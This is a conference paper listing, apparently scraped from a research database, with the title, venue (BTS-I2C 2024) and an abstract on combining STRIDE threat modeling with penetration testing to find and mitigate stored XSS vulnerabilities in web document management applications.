Combining STRIDE and Penetration Testing for Improved Web Application Security: A Case Study on Stored XSS Vulnerabilities

Combining STRIDE and Penetration Testing for Improved Web Application Security: A Case Study on Stored XSS Vulnerabilities

연구 분야: Strategies

학회: 2024 Beyond Technology Summit on Informatics International Conference (BTS-I2C)

The increasing use of web-based document management applications has heightened security risks, particularly from vulnerabilities like stored Cross-Site Scripting (XSS) attacks, highlighted in the OWASP Top 10. This research investigates using STRIDE threat modeling to systematically identify and address security weaknesses in such applications. By integrating threat modeling with penetration testing, the study focuses on stored XSS vulnerabilities, often exploited to steal sensitive user information or hijack accounts. The STRIDE framework was applied to map potential threats, simulate real-world attack scenarios, and assess the system's security posture. The results demonstrate that combining STRIDE with penetration testing significantly improves the ability to detect and mitigate vulnerabilities, especially stored XSS, which enhances overall security. The study underscores the importance of structured threat modeling in modern cybersecurity practices and proposes future research to extend STRIDE to emerging technologies, such as cloud services and Internet of Things (IoT) environments while integrating automated tools for dynamic threat adaptation.